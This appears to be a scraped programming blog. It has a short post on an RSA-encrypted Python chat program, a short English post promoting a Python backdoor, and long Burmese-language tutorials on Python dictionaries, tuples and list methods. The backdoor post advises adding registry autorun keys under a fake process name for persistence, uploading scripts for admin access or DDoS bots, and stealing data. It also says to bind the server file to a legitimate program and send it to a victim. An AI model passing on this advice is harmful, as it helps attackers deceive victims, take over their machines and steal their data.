Hi folks, I just wrote chatting program by Python. It is a client / server chatting system
(socket server). For secure messaging, it uses RSA key encryption.
Might be useful for private chats.
You will need PyCrypto library for encryption.
pip install pycrypto
Use version 2, the project moved from Socket to Twisted framework.
You will need Twisted framework, install here
Now it becomes asynchronous communication which is better for chatting.
Also fixed for username, now there cannot be duplicated username in same channel.
support private chat to specific user
priv8:USERNAME> MESSAGE
to view all commands
cmd:help
Check the soruce code here
Screen Shots
Client
Server
Backdoor in Python
And if you target Windows machine, use _winrag module to edit Registry therefore you can add auto run key with fake procress name. For *nix machines, there is a file called /etc/init.d which is similar to Windows Registry
Features: 
  • Upload scripts for further attacks such as gaining Admin access or use at bot for DDOS. 
  • Steal(download) Datas. use 'exit' to disconnect and you can reconnect easily. 
  • For commands in detials, type 'help' in console.
Usage for console: python console.py ip port.
Bind server.py with legitimate program and send it to victim. You can actually just give server.py and told to run it. But it is suspicious to give it directly.
GitHub Repository
 ကျွန်တော်တို့ အရင်တစ်ခေါက်က Tuple အကြောင်းပြောခဲ့ကြတယ်နော် ဒီတစ်ခေါက်တော့ Dictionary အကြောင်းလေးစလိုက်ကြရအောင်ဗျာ...
Dictionaries
သူကတော့ကျွန်တော်တို့ အရင်ကပြောခဲ့တဲ့ List လိုပါပဲ ဒါပေသိမတူတာက List မှာကို indices က integers ဖြစ်ပေမယ့် ဒီကောင်မှာတော့ indices က any types ပါ။ (Exceptions လေးတွေတော့ရှိတာပေါ့) ပြီးတော့သူက Curly Bracket တွန့် ကွင်းလေးနဲ့ ရေးတယ်ဗျ။ {}
Dictionary တစ်ခုမှာဆို Keys and Values ဆိုပြီးရှိတယ်ဗျ။ Key တစ်ခုစီတိုင်းကဆိုင်ရာဆိုင်ရာ value တွေနဲ့ ချိတ်ထားပါတယ်။ E လိုပြောရမယ်ဆို mapping ပေါ့။ ဒီလို key and value တွဲရက်ကို key-value pair လို့ ဆိုသလို item လို့ လဲခေါ်ပါသေးတယ်။ ပြီးတော့ key and value ကို : နဲ့ ခြားပြီး item တွေကြားကိုတော့ , နဲ့ ခြားပါတယ်။ Tuple တစ်ခုပြုလုပ်ရင် tuple() ဆိုတဲ့ function ရှိသလို dictionary တစ်ခုအတွက်လဲ dict() ဆိုတာရှိပါတယ်။
>>> means = dict()
>>> means
{}
>>> means['MSF'] = 'Myanmar Security Forum'
>>> means
{'MSF':'Myanmar Security Forum'}
ဒါပေမယ့် အခုလိုမရေးပဲ Dictionary ထဲမှာသင်က items ၃, ၄ ခုထည့်မယ်ဆိုအောက်ကလိုရေးသွားလို့ ရပါတယ်။
>>> means = {'MSF': 'Myanmar Security Forum', 'GNU': 'GNU is Not Unix',
'GPL': 'General Public License'}
ဒါပေသိ အခုလို Dictionary လေးလုပ်ပြီး print ထုတ်ကြည့်ပါ။ ခုနကရေးလိုက်တဲ့ order အတိုင်းပြန်ထွက်လာမှာမပာုတ်ပါဘူး။ သို့ သော် ဘာမှတော့အရေးထားစရာမလိုပါဘူး ကျွန်တော်တို့ က key နဲ့ ပဲ value ကိုပြန်ခေါ်မှာပါ။ Lists တို့ လို index နဲ့ ခေါ်စရာမှမလိုတာ။ နောက် dictionary တစ်ခုထဲမှာကိုယ်သိချင်တဲ့ key ရှိမရှိကို in နဲ့ စစ်ကြည့်လို့ ရပါတယ်။ သို့ သော်သူက key ကိုပဲတိုက်သွားမှာနော် value နဲ့ တိုက်တာမပာုတ်ပါဘူး ဒါလေးကိုတော့သတိထားပေးပါ။
>>> means['MSF']
'Myanmar Security Forum'
>>> 'MSF' in means
True
>>> 'Myanmar Security Forum' in means
False
>>> # Because there's no key called 'Myanmar Security Forum' in means
…
>>>
သဘောပေါက်တယ်မလားဗျ။ သူက key ကိုပဲတိုက်စစ်တာပါ။ ဒုတိယတစ်ခုမှာကျတော့ 'Myanmar Security Forum' ဆိုတဲ့ key က မရှိဘူးလေ ဒီအတွက်ကြောင့် False ပြန်တာပါ။
4.1 Dictionary as a set of counters
ကျွန်တော်တို့  Word Counter လေးတစ်ခုလောက်ရေးကြည့်ရအောင်ဗျာ။
def counter(words):
thedictionary = dict()   #1
for x in words:        #2
if x not in thedictionary: #3
thedictionary[x] = 1
else:        #4
thedictionary[x] += 1
return thedictionary
#1 မှာကျွန်တော်တို့ အရင်ဆုံး empty dictionary တစ်ခုလုပ်လိုက်ပါတယ်နောက် #2 မှာကျွန်တော်တို့ for နဲ့ looping ပတ်ပါတယ်။ အဲ့သလို looping ပတ်တဲ့အချိန်မှာ #3 မှာဆိုအကယ်လို့ looping ပတ်တဲ့ထဲကကောင်က thedictionary ဆိုတဲ့ dictionary ထဲမှာမပါခဲ့ရင် အဲ့ word ကို key အဖြစ်ထားပြီး value 1 နဲ့ ပေးညီပေးပါတယ်။ #4 ဆိုတဲ့ else (မပါတာမပာုတ်တော့ Dictionary ထဲမှာပါပြီးသားဖြစ်နေရင်) ဒါဆိုရင်တော့ value ကို 1 ပေါင်းပေးသဿွားလိုက်ပါတယ်။ နောက်ပတ်စရာရှိတာပတ်ပြီးသွားရင်တော့  dictionary ကို return ပြန်ပါတယ်။
ပိုရှင်းအောင် function လေးကို interpreter မှာရေးပြီးတော့စမ်းကြည့်ပေါ့ဗျာ။
4.2 Reverse lookup
ကျွန်တော်တို့ တွေ Value Lookup Program လေးတစ်ခုဆို dictionary ကို d လို့ ဆိုပါစို နောက် key ကိုတော့ k ပေါ့။ ဒါဆို key နဲ့ သက်ဆိုင်ရာ value ဆိုရင်တော့ v = d[k] ဖြစ်မယ်ပေါ့ ဒီလိုမျိုးကို lookup လို့ ခေါ်ပါတယ် ဒါပေသိ ကျွန်တော်တို့ က value ကိုရိုက်ထည့်ပြီး key ကိုပြန်သိချင်ရင်ဘယ်လိုလုပ်ကြမလဲ?
ဒီလိုမျိုးအတွက်တွေးကြည့်တော့ပြသနာလေးရှိလာပါတယ်။ အဲ့တာက အဲ့ဒီ value ကိုပဲ key ဘယ်နခုကတောင် mapping ထားတာလဲ? ပြောရရင်ဗျာ d = {'a': 'MSF', 'b': 'MSF'} ဒါမျိုးကိုပြောတာပါ။ အဲ့လိုမျိုးဖြစ်ခဲ့ရင်ကော ကျွန်တော်တို့ ကဘယ်လို return ပြန်စေချင်တာလဲ။
အောက်ကကောင်လေးကတော့ value ကိုတောင်းပြီးတော့ အဲ့ value နဲ့ mapping ဖြစ်နေပြီး စတွေ့ တွေ့ ချင်း key ကို return ပြန်မှာပါ။
def reverse_lookup(d, v):
for k in d:
if d[k] == v:
return k
raise ValueError
for နဲ့  looping ပတ်ထားတာမှာသဘောက d ဆိုတဲ့ dictionary ထဲမှာရှိနေတဲ့ k ဆိုတဲ့ key တွေထဲက အကယ်လို့  key ရဲ့ value ( d[k] ) ကသာ v ဆိုတဲ့ value နဲ့ တူညီနေမယ်ဆိုရင် အဲ့ key ကို return ပြန်ပေးပါလို့ ပြောတာပါ။ နောက်တူညီတာမျိုးမရှိရင် ValueError ဆိုတဲ့ exception ကိုဖော်ပြခိုင်းတာပါ။ ရှင်းတယ်မလားဗျ။ ပိုမြင်လဿွယ်သွားအောင် မိမိဘာသာ dictionary တစ်ခုဆောက်နောက် d မှာ asign လုပ်နောက် v မှာလဲ search ချင်တဲ့ value ကိုထည့်ပြီးစမ်းကြည့်လိုက်ပါ။ ဒီလောက်တော့လုပ်တတ်မယ်ထင်ပါတယ်နော် ကျွန်တော်ရေးမပြတော့ပါဘူး။
4.3 Dictionaries and Lists
Dictionaries တွေထဲမှာ Lists တွေကို values အနေနဲ့ သုံးနိုင်ပါတယ်။ 
Key နဲ့  Value ကို invert လုပ်မယ့် program လေးတစ်ခုကိုတွေးကြည့်ရအောင်ဗျာ။ Function မှာအရင်ဆုံး empty dictionary တစ်ခုဆောက်ထားမယ် function parenthesis မှာ dictionary တောင်းမယ် ဒီ program ကနေ key နဲ့  value ကိုယူမယ်ဗျာ။ ဒီအထိတော့အိုကေပြီ ဒါဆို condition တစ်ခုလုပ်မယ်အဲ့ condition ထဲမှာ value ကမရှိရင် value ကို key အနေနဲ့ ယူမယ်နောက် equal sign ရဲ့ right hand side မှာ key ကိုရေးမယ်။ အကယ်လို့  value ကရှိနေမယ်ဆိုရင် သူရဲ့  key ကို append လုပ်မယ်။ နောက်ဆုံးရလာတဲ့ result ကို return ပြန်လိုက်ပါမယ်။
စားသွားလားမသိဘူး။ ပြောနေကြာတယ် ရှင်းသွားအောင်အောက်က code လေးတွေကိုဖတ်လိုက်ပါတော့။
def invert_dict(d):
inverse = dict()
for key in d:
val = d[key]
if val not in inverse:
inverse[val] = [key]
else:
inverse[val].append(key)
return inverse
အဲ့ function လေးကိုမိမိဘာသာစမ်းကြည့်လိုက်ပါ။ စမ်းပြီးရင်မေးစရာတစ်ခုရှိပါလိမ့်မယ် ကျုပ်ထည့်လိုက်တုံးက string တွေလေ invert ပြန်ထွက်လာတော့ ဘာလို့ value တွေက List ဖြစ်နေရတာလဲ? ဒီလိုဗျ အမှန်ဆို key and value invert လုပ်ဖို့ အတွက်က List မလုပ်လဲရပါတယ် ဒါပေသိ ကျွန်တော်ကအပေါ်မှာရေးခဲ့တဲ့ counter() ဆိုတဲ့ function လေးနဲ့တွဲသုံးပြစရာလေးရှိလို့  ကျွန်တော့်အစမှာ Lists က value ဖြစ်နိုင်တယ်လို့ ပြောတယ် ပာုတ်တယ်ပာုတ်.... အကယ်လို့သာခင်ဗျားစီမှာ Letters ကနေ frequencies ကို map တဲ့ dictionary ကို frequencies ကနေ letters ကိုပြန် map တဲ့ dictionary လိုချင်တယ်ဗျာ invert မယ်ပေါ့ ဒါပေသိ အကယ်လို့သာ frequency တူတဲ့ letter တွေသာပါလာမယ်ဆို inverted dictionary ထဲမှာပါလဲမယ့် value တွေသည် string မပာုတ်ပဲ Listed Letter တွေဖြစ်နေရပါမယ်။
လည်နေသေးတယ်ထင်တယ်။
(counter() ဆိုတဲ့ကောင်က built-in မပာုတ်ဘူးနော် အပေါ်မှာကျွန်တော်တို့ ရေးခဲ့ပြီးသားပါ)
>>> mydict = counter('hello')
>>> mydict
{'h': 1, 'e': 1, 'l': 2, 'o': 1}
>>>
>>> inverse = invert_dict(mydict)
>>> inverse
{1: ['h', 'e', 'o'], 2: ['l']}
အခုလိုမျိုး frequency တစ်ခုထဲရှိတဲ့ letter တွေကိုတစ်တွဲ နောက် frequency နှစ်ခုရှိတာကိုတစ်တွဲဒါမျိုးစုချင်တဲ့အတွက် invert_dict() မှာကျွန်တော်တို့ value ပြန်ရင် List နဲ့ လုပ်ခဲ့တာပါ။
ကျွန်တော်က Lists တွေကို Dictionary ရဲ့ Value ဖြစ်နိုင်တယ်လို့ ပြောခဲ့တယ်။ နေအုံးဒါဆို key ကောမဖြစ်နိုင်ဘူးလားဆိုတော့ မဖြစ်နိုင်ပါဘူး ဘာလို့ လဲဆိုတာအောက်ကဥပမာလေးနဲ့ ပြပါမယ်။
>>> x = [1, 2, 3]
>>> y = dict() # Creating Empty Dictionary
>>> y[x] = 'value'
ဒီတော့ဘာဆက်ဖြစ်မလဲ? ဘာဖြစ်မလဲဆိုတော့ Error တက်တာပေါ့ကွယ် ဒါဆိုဘယ်လို Error လဲ? ပာိုလို Error အဲလေ TypeError ပါ။ တိတိကျကျပြောရရင် TypeError: list objects are unhashable
ဘာလဲ unhashable? ဒီလိုဗျ Dictionary က hashtable ကိုအသုံးပြုပြီး implementation ပြုလုပ်ပါတယ်ဆိုတော့ကာပြောချင်တာက keys တွေသည် hashable ဖြစ်ရပါမယ် ဒါပေသိအခုပြောပုံဆို Lists က hashable မဖြစ်ဘူး ဒါကိုဆိုလိုတာပါ။
hash ဆိုတာက value တစ်ခုကိုယူပြီး integer ပြန်ပေးတဲ့ function တစ်ခုပါပဲ။ Dictionaries တွေက items (keys and values) တွေကိုကြည့်ဖို့ အတွက်ခုနက return ပြန်ပေးတဲ့ integers တနည်းပြောရရင် hash values တွေကိုအသုံးပြုပါတယ်။ 
ုKeys တွေက immutable ဖြစ်နေရင်ပြောစရာမရှိပါဘူး ဒါပေသိခုနက List လို mutable type ဆိုရင်ပြောစရာရှိလာပြီ။ ဒီလိုဗျာသင်က key-value pair တစ်ခုကို create လုပ်လိုက်ပြီဆို Python က key ကို hash လုပ်ပြီး corresponding location တစ်ခုခုမှာ သိမ်းထားလိုက်ပါတယ်။ အကယ်လို့ သာသင်က key ကိုချိန်းလိုက်တယ်ဆို Python ကလဲ hash ပြန်လုပ်ပြီးနောက်တစ်နေရာမှာထပ်သဿိမ်းတယ် ဒါဆို key တစ်ခုအတွက် entry ၂ခုဖြစ်သွားပြီ ဒါမှမပာုတ်ရင် key ကိုရှာကိုမတွေ့ တာပဲဖြစ်သွားမှာပါ။ ဒါဆို dictionary ကအလုပ်မလုပ်တော့ဘူးပေါ့ဗျာ။
ဒါကြောင့် keys တွေသည် hashable နဲ့ immutable ဖြစ်ရတာပါ။ ဒါကြောင့် constant အဖြစ်သုံးနိုင်တဲ့ tuple တွေကို key အဖြစ်သုံးနိုင်တာပါ။ (tuple အကြောင်းကိုအရင်အခန်းမှာပြောခဲ့ပြီးပါပြီ။)
4.4 Global Variables
Python မှာ special frame ဖြစ်တဲ့ __main__ ဆိုတာရှိတယ်ဗျ။ __main__ ထဲမှာရှိတဲ့ Variables တွေသည် global variables တွေပါ ဘာလို့ လဲဆိုတဲ့ တခြား function တွေနေယူသုံးလို့ရလို့ ပါ။ နောက်ကြုံတုံးပြောအုံးမယ် Local Variables တွေဆိုတာလဲရှိပါတယ် သူတို့ ကတော့ သူတို့ ရဲ့ function ပြီးသွားရင် function နဲ့ အတူပျောက်သွားတယ်ပေါ့။ နောက် Global Variables တွေကို flags တွေအနေနဲ့လဲသုံးကြပါတယ်။ အောက်ကဥပမာလေးလိုပေါ့။
verbose = True
def example1():
if verbose:
print “It's True!”
ရှင်းစရာမလိုဘူးထင်ပါတယ် သဘောပေါက်တယ်ပာုတ်တယ်ပာုတ်။ နောက် Global, Local ကိုစဖတ်တဲ့သူတွေမှားတာတစ်ခုရှိတယ်ဗျ အဲ့တာကတော့...
verbose = False
def example2():
verbose = True
အဲ့မှာစတာပဲကိုယ့်လူရေ သူတို့ ကတော့ verbose ရဲ့ value ကိုချိန်းတယ်ပေါ့ ဒါပေသိထင်သလိုမဖြစ်ပဲမပြောင်းဘူးဗျ။ ဒါကတကယ်တော့ Global ကကောင်ကိုချိန်းတာဖြစ်မသဿွားပဲနဲ့  Local ထဲမှာ verbose ဆိုတဲ့ variable အသစ်တစ်ခုလုပ်လိုက်တာပါ။ ဒီတော့ Global က variable ကိုသက်ရောက်မှုမရှိဘူးပေါ့ဗျာ။ ဒါဆိုပော့လူ ကျုပ်ကတော့ Global ကကောင်ကိုချိန်းချင်တယ်ဗျ ဒီလိုမလုပ်လို့ ဘယ်လိုသွားလုပ်မှာလဲ? ဒီလိုရှိတယ်ဗျ  Global ကကောင်ကိုချိန်းချင်အရင်ဆုံး declare ကြေညာပေးရတယ်ပေါ့ဗျာ။
verbose = False
def example2():
global verbose
verbose = True
အောက်ကကောင်လေးကတော့ Global က variable ကိုချိန်းချင်တဲ့ကောင်လေးပေါ့ အဲ့လိုချိန်းဖို့ လုပ်တဲ့အခါမှာ UnboundLocalError တက်ပါတယ်။
>>> count = 0
>>> def example3():
... count += 1
...
UnboundLocalError: …..............
ဒီတော့ဘာခက်သလဲအပေါ်မှာပြောသလိုကြေညာပေးလိုက်ပေါ့ (တစ်ခုတော့ပြောအုံးမယ် အကယ်လို Variable ကသာ mutable type ဖြစ်နေခဲ့ရင်တော့ declare လုပ်စရာမလိုပါဘူး)
Dictionary အကြောင်းကတော့ဒီလောက်ပါပဲ။
(c) PyLab 2016
အပိုင်း၃ကိုမှာတော့ ကျွန်တော်တို့  Tuple အကြောင်းကိုလေ့လာကြပါမယ်။
Tuples
3.1 Tuples are immutable
အရင်ကလဲကျွန်တော်ပြောခဲ့ပါတယ်။ Tuples တွေကို constant ဖြစ်စေချင်တဲ့ Sequence တွေမှာသုံးကြပါတယ်။ Tuple ဆိုတာပာာလဲ Values တွေကို Sequence လိုက်သတ်မှတ်ထားတာပါပဲ။ Values တွေကကြိုက်တဲ့ Type ဖြစ်နိုင်ပါတယ် နောက် Lists တုံးကလိုပါပဲ integers နဲ့ ပဲ indexed ထားတာပါ။ Lists နဲ့ တူတဲ့အချက်တွေပေါ့လေ မတူတာဆိုလို့  Mutable မဖြစ်တာပါ။
Tuples တွေကိုရေးရင် parentheses မပါပဲ comma (,) ကုဒ်ပြီးရေးလိုက်တာနဲ့ တင် tuple ဖြစ်ပါတယ်။
>>> a = 'Hello',
ဒါပေသိအကျင့်ဖြစ်ပြီး ကြည့်ရတာရှင်းရှင်းလင်းလင်းဖြစ်အောင်တော့ထည့်ရေးပေးပါ။
>>> a = ('Hello', 'World', 1)
>>> type(a)
<type 'tuple'>
>>> type(a[0])
<type 'string'>
>>> type(a[2])
<type 'int'>
>>> b = tuple('MSF')
>>> b
('M', 'S', 'F')
Lists မှာတုံးကပြောခဲ့တဲ့ indexing နဲ့  slicing က tuple မှာလဲအလုပ်လုပ်ပါတယ်။
>>> a
('Hello', 'World', 1)
>>> a[2]
1
>>> a[:2]
('Hello', 'World')
Tuple တွေသည် immutable ဖြစ်တဲ့အတွက် modify လုပ်လို့ မရပါ ဒါပေသိ replace လုပ်လို့ တော့ရပါတယ်။
>>> a[2] = 2
TypeError: 'tuple' object doesn't support item assignment
>>> a = tuple('MSF')
>>> a
('M', 'S', 'F')
3.2 Tuple Assignment
Variable ၁ခုထက်ပိုတာကို တပြိုင်ထဲ assign လုပ်ချင် comma ကုဒ်ပြီးတွဲပေးသွားလို့ ရပါတယ်။ ဒါပေသိ left hand side နဲ့  right hand side က အရေအတွက်တူညီရမှာပါ။
>>> a, b = 1, 2
>>> c, d = 1, 2, 3
ValueError: too many values to unpack
>>> addres = 'helloworld@python.org'
>>> usrname, domain = addres.split('@')
အရင်က split() ဆိုတာကိုသုံးပေးခဲ့ဖူးပါတယ်။ သဘောပေါက်မယ်ထင်ပါတယ်။
3.3 Tuples as return values
Function တစ်ခုပာာ Value တစ်ခုထဲကိုပဲ Return ပြန်နိုင်ပါတယ်။ ဒါပေမဲ့ Value က tuple ဖြစ်နေရင် ဒါပာာ multiple values ကို return ပြန်ပေးသလိုပါပဲ။ သချာင်္မှာ Quotient (စားလဒ်) နဲ့ Remainder (အကြွင်း) ဆိုတာကြားဖူးမယ်ထင်ပါတယ်။ ဒီအတွက် Python မှာ divmod() ဆိုတဲ့ built-in function တစ်ခုရှိပါတယ်။ သူက argument ၂ခုကိုယူမယ်နောက်ပြီးရင် quotient နဲ့  remainder ကို tuple အဖြစ်နဲ့ပြန်ပေးပါတယ်။
ကျွန်တော်ပြောတာထက်ပိုရှင်းချင် Python interpreter မှာ help('divmod') လို့ ရိုက်ကြည့်လိုက်ပါ။ သူတွက်ချက်တဲ့ formula လေးကို x နဲ့  y အနေနဲ့ ဖော်ပြပေးထားမှာပါ။
>>> a = divmod(9, 3)
>>> a
(3, 0) #first argument is quotient and second argument is remainder
3.4 Lists and tuples
Python မှာ zip() ဆိုတဲ့ built-in function လေးတစ်ခုရှိတယ်ဗျ။ သူက ၂ခုဒါမှမပာုတ် ၂ခုထက်ပိုတဲ့ sequence တွေကို tuple တစ်ခုချင်းစီနဲ့  List ပြုလုပ်ပေးပါတယ်။ လည်သွားပြီလားမသိ... ဥပမာလေးကြည့်လိုက်ရအောင်...
>>> a = 'abc'
>>> b = [1, 2, 3]
>>> zip(a, b)
[('a', 1), ('b', 2), ('c', 3)]
ရှင်းတယ်မလား ဒါဆိုဆက်မယ် အကယ်လို့  zip ထဲထည့်မယ့် argument ၂ခုက length မတူရင်ကော
>>> c = 'Hello'
>>> d = 'MSF'
>>> e = zip(c, d)
>>> e
[('H', 'M'), ('E', 'S'), ('L', 'F')]
မြင်တယ်မလားဗျ။ Error မတက်ပါဘူး။ သူမှာရှိသလောက်နဲ့ ပဲတွဲပေးသွားမှာပါ။ ဒါဆိုအဲ့ဒီ e ဆိုတာကို for loop ပတ်ပြီးတော့ တွဲရက် argument တွေကိုတစ်ကြောင်းချင်းဖော်ပြမယ့် function ရေးမယ်ဗျာ။
>>> for x, y in e:
… print x, y
...
H M
e S
l  F
3. 5 Comparing Tuples
Tuple တွေကို compare လုပ်မယ်ဆိုရင် left hand side နဲ့  right hand side ရှိတယ်ဆိုပါစို့ ။ LHS ဘက်က first element ကို RHS ဘက်က first element နဲ့ ကိုစပြီး compare လုပ်ပါတယ်။ equal ဖြစ်တယ်ဆိုမှနောက် element ကိုသွားပြီး differ ဖြစ်တဲ့အထိဒီအတိုင်းလုပ်ဆောင်သွားပါတယ်။ Subsequence တွေကိုတော့ထည့်မတွက်ပါဘူး။
>>> (0, 1, 2) < (0, 3, 4)
True
>>> (0, 1, 10) < (0, 3, 4)
True
>>> (0, 10, 2) < (0, 3, 4)
False
>>> (10, 1, 2) < (0, 3, 4)
False
sort function ကလဲအဲ့သလိုပဲပါ first element ကိုစလုပ်ပါတယ်။ အကယ်လို့ တူနေခဲ့ရင် second element နဲ့ sort သွားပါတယ်....
နောက်ပြောစရာရှိတာလေးကတော့ DSU patten ပေါ့။ အရှည်ခေါက်ကတော့ Decorate, Sort and Undecorate
Decorate = အရင်ဆုံး sequence ကို tuples ပြောင်းနောက်သက်ဆိုင်ရာ sequence ထဲက element ရဲ့သက်ဆိုင်ရာ key နဲ့ အတူ List ထဲထည့်လိုက်ပါတယ်။ ပြောရရင် List of tuples ပေါ့။
Sort = အဲ့ List ထဲက tuple တွေကို sorting လုပ်ပါတယ်။
Undecorate = နောက် sorted လုပ်ထားတဲ့ sequence ကို extract ပြန်လုပ်ပါတယ်။
အောက်ကဥပမာလေးကြည့်လိုက်ရအောင်ပိုရှင်းအောင်ပေါ့ သူက ထည့်လိုက်တဲ့ string ကို List အနေနဲ့ ပြောင်းပြန်ပြပေးမှာပါ။
def sortby_length(x):
a = []
for word in x:
a.append((len(word), word)) # Decorate
a.sort(reverse=True) # Sort
res = []
for length, word in a:
res.append(word)
return res # Undecorate
3.6 Sequence of sequences
Strings, lists နဲ့  tuples တွေကိုလိုအပ်တဲ့နေရာမှာသင့်တော်သလိုအသုံးပြုကြပါတယ်။ String ကနေစပြောရမယ်ဆို strings တွေပာာ immutable ဖြစ်ပါတယ်နောက် elements တွေပာာလဲ character တွေဖြစ်ကိုဖြစ်ရပါမယ်။ အကယ်လို့ new strings လဲမလုပ်ချင်ပဲ characters တွေကို changes ပြုလုပ်မယ်ဆို List ကိုအသုံးပြုရပါမယ်။
Lists တွေက tuples တွေထက်ပိုတွေ့ ရတတ်ပါတယ်။ mutable ဖြစ်တာကလဲတစ်ပိုင်းပေါ့ ဒါပေသိ တချို့ အခြေအနေမျိုးတွေမှာ Tuples တွေကိုအသုံးပြုရမယ့်အခါမျိုးတွေရှိတတ်ပါတယ်။ ဘယ်လိုအချိန်အခါမျိုးလဲဆိုတော့.....
  1. Return statement လိုနေရာမျိုးမှာဆို List တစ်ခုလုပ်ရတာထက် Tuple ပဲအသုံးပြုရတာကပိုအဆင်ပြေပါတယ် သို့ သော် exception လေးတွေတော့ရှိတာပေါ့..
  2. Dictionary အကြောင်းတော့မပြောရသေးဘူးပေါ့... (အကြမ်းဖျင်းပြောရမယ်ဆို Dictionary မှာ keys and values ဆိုပြီးရှိပါတယ်) အဲ့ဒီ Keys တွေကိုကျ constant ဖြစ်ဖို့ အတွက် immutable types တွေဖြစ်တဲ့  strings ဒါမှမပာုတ် tuples ကိုပဲအသုံးပြုရပါတယ်။
  3. Function ထဲကို sequence တစ်ခုအား argument အနေနဲ့ ထည့်တဲ့အချိန်မှာ tuples ကိုအသုံးပြုတာက aliasing မှာ error ဖြစ်နိုင်ခြေနည်းသွားစေပါတယ်။
ဒါပေသိ Tuples တွေက immutable ဖြစ်တဲ့အတွက် Lists တွေလို sort တို့ လို modify လုပ်တဲ့ကောင်တွေတော့မရဘူးပေါ့။ကြုံတုံးပြောသွားအုံးမယ် sort() က ငယ်စဉ်ကြီးလိုက်စီသလို ကြီးစဉ်ငယ်လိုက်ဆို reverse() ကိုသုံးနိုင်ပါတယ်။ ဒါပေသိ Python မှာ Tuple ကို List လို sort တို့ reverse  တို့ လုပ်နိုင်အောင် built-in function လေး ၂ခုရှိပါသေးတယ်။ အဲ့တာကတော့ sorted() နဲ့  reversed() ပါ။ 
မတူဘူးနော်... အခုပာာက ed နဲ့ ဆုံးတာနော်။ နောက်အဲ့ကောင်တွေက list အနေနဲ့ ပြန်တာပါ ဒီတော့ tuple ပြန်ဖြစ်စေချင် tuple() ဆိုတဲ့ function နဲ့ တွဲသုံးရမှာပါ။ ဥပမာလေးရေးပြပါမယ်။
>>> a = (1, 3, 2)
>>> a = tuple(sorted(a))
>>> a
(1, 2, 3)
Tuple အကြောင်းကတော့ဒီလောက်ပါပဲ သိပ်ပြောစရာမရှိပါဘူး။ နောက်တစ်ခန်းကျရင်တော့ကျွန်တော်တို့ Dictionary အကြောင်းကိုလေ့လာကြပါမယ်။
(C) PyLab 2016
အပိုင်း ၂မှာပြောခဲ့တဲ့ Lists တွေအကြောင်းကိုပဲဆက်ပြောပါမယ်ဗျာ။
2.6 List methods
Python မှာ Lists အတွက်အသုံးပြုနိုင်တဲ့ methods လေးတွေရှိပါတယ်။ ပထမတစ်ခုကတော့ append() ပါ။
>>> a = [1, 2, 3]
>>> a.append(4)
>>> a
[1, 2, 3, 4]
ဒါဆို b ဆိုတဲ့ List ထပ်လုပ်ပြီး b ထဲက elements တွေကို a ထဲထည့်မယ်ဗျာ။ append() ကိုပဲသုံးရမလားဆိုတော့မပာုတ်ပါဘူး။ သုံးရင် Error တော့မတက်ပါဘူး ဒါပေမယ့် ကျွန်တော်တို့ ဖြစ်စေချင်သလိုဖြစ်မှာမပာုတ်ပါဘူး။
>>> a
[1, 2, 3, 4]
>>> b = [5, 6]
>>> a.append(b)
[1, 2, 3, 4, [5 ,6]]
မြင်တယ်မလားဗျ။ အခုလို append သုံးလိုက်ရင် b ရဲ့ Elements တွေကိုမထည့်လိုက်ပဲ b ဆိုတဲ့ List ကြီးကို nested အနေနဲ့ ထည့်လိုက်ပါတယ်။ ဒီတော့ဘယ်လိုလုပ်ကြမလဲ? 
extend() ဆိုတဲ့နောက်ထပ် method ကိုသုံးပါမယ်။ သူကတော့ကျွန်တော်တို့ လိုချင်တဲ့ b ရဲ့ elements တွေကိုပဲယူပြီး a ထဲထည့်ဖို့ အတွက်ကိုလုပ်ဆောင်ပေးမှာပါ။
>>> a = [1, 2, 3]
>>> b = [4, 5]
>>> a.extend(b)
>>> a
[1, 2, 3, 4, 5]
ဒါဆိုနောက် method တစ်ခုကိုထပ်သွားရအောင်ဗျာ။ sort() ဆိုတာကို alphabet အလိုက်ပြန်စီတာမျိုးတွေနောက် order အလိုက်(Low to High) ပြန်စီချင်ရင်အသုံးပြုပါတယ်။
>>> a = [‘e’, ‘b’, ‘d’, ‘f’, ‘a’, ‘c’]
>>> a.sort()
>>> a
[‘a’, ‘b’, ‘c’, ‘d’, ‘e’, ‘f’]
ဒါဆို ခုနကလို sort လုပ်တာကို variable တစ်ခုနဲ့ ပေးညီကြည့်လိုက်ပါ။
>>> a = [‘e’, ‘b’, ‘d’, ‘f’, ‘a’, ‘c’]
>>> b = a.sort()
>>> print b
None
ဘာမှပြန်မပြဘူးနော်။ ဘာလို့ လဲဆိုတော့ List methods တွေအကုန်လုံး List ကို modify လုပ်ပြီးရင် return None ပဲပြန်ပါတယ်။ ပြောရရင် List methods တွေအကုန်လုံးက void တွေပါပဲ။ C သမားတွေဆိုသိပြီးသားဖြစ်မှာပါ။ void function တွေဆို return 0 လို့ အောက်ဆုံးမှရေးစရာမလိုတာကို… အခုလဲဒီသဘောပါပဲ။
2.7 Map, filter and reduce 
ကဲ a = [1, 2, 3] ဆိုတာထားပါတော့ ဒီထဲက elements တွေကိုပေါင်းတဲ့ရလဒ်သိချင်ဘယ်လိုလုပ်မလဲ? အခုဥပမာကတော့ဘယ်ပြောစရာလိုတုံး 6 ဆိုတာလူတိုင်းသိတယ် ဒါပေသိ elements က အခု၃၀, ၄၀ ဆိုဘယ်လိုလုပ်မလဲ? sum() ဆိုတာလေးကိုသုံးပါမယ်။
>>> a = [1, 2, 3]
>>> sum(a)
6
အခုလိုမျိုး sequence of elements တွေကို single value ဖြစ်အောင်ပေါင်းတဲ့လုပ်ဆောင်ချက်ကို reduce လို့ ခေါ်ပါတယ်။
နေအုံးအခုလို sum() ဆိုတာကိုကိုယ့်ဘာသာရေးကြည့်မယ်ဆို…
def add_up(a):
   total = 0
   for x in a:
       total += x # equal to total = total + x
   return total
initial အနေနဲ့ total ကို သုညပေးထားပါတယ်။ a = [1, 2, 3] နဲ့ ပြောရမယ်ဆို အရင်ဆုံး a ကနေ 1 ကိုယူပါတယ် ပြီးရင် 0 ဆိုတဲ့ total ကို x တန်ဖိုး 1 နဲ့ ပေါင်းပြီး total နဲ့ ပေးညီလိုက်တော့ total က 1 ဖြစ်သွားတယ်။ နောက် 2 ကိုယူပြီးပေါင်းတယ် ပြန်ပေးညီတော့ 3 ဖြစ်သွားတယ်။ နောက် 3 ကိုထပ်ယူပြီး total (လက်ရှိမှာ 1 နဲ့ 2 ကိုပေါင်းထားလို့  3 ဖြစ်နေပါတယ်) ပေါင်းလိုက်တော့ 6 ဖြစ်သွားပါတယ်။ ပြီးရင်အဲ့တာကို return ပြန်လိုက်ပါတယ်။ ဒါပါပဲ။ total ကဲ့သို့ အသုံးပြုသွားရတဲ့ Variable ကို accumulator လို့ ခေါ်ပါတယ်။
